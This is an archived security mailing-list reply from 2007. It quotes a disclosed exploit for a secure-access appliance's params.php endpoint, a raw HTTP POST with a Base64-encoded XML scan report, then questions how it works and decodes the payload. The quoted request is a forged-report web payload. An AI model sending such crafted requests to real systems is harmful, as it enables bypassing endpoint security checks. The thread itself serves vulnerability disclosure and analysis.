Hi,

On Mon, 22 Jan 2007 07:37:29 +0200
"Roni Bachar" <roni@xxxxxxxxxxx> wrote:

> The vulnerability can be exploited by doing the following stages:
>
> Sending a post request as follows:
>
> POST https://serverip/sre/params.php HTTP/1.1
> Content-Type: application/x-www-form-urlencoded
> User-Agent: ICS_Secure
> Host: serverip
> Content-Length: 251
> Cache-Control: no-cache
> Cookie: ICS_Test_Cookie=1
>
> Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM
> TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y
> WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L
> 1NyZVNjYW5SZXBvcnQ+Cg==

I assume you meant to say that the Base64 encoded data in the Report variable
must be adjusted to reflect the actual hostname etc., or is params.php
accepting _any_ report that looks reasonably valid?

For reference, the decoded data in this example is:

<?xml version="1.0"?>

<SreScanReport Version="">
    <UserInfo WinDomain="" WinUser="roni" WinUserCatalog="C:\Documents and Settings\roni.LENOVO-4FFEF4E3"/>
</SreScanReport>

cheers
FX

--
SABRE Labs GmbH           | Felix 'FX' Lindner <fx@xxxxxxxxxxxxxx>
http://www.sabre-labs.com | GSM: +49 171 7402062
Wrangelstrasse 4          | PGP: A740 DE51 9891 19DF 0D05
10997 Berlin, Germany     |      13B3 1759 C388 C92D 6BBB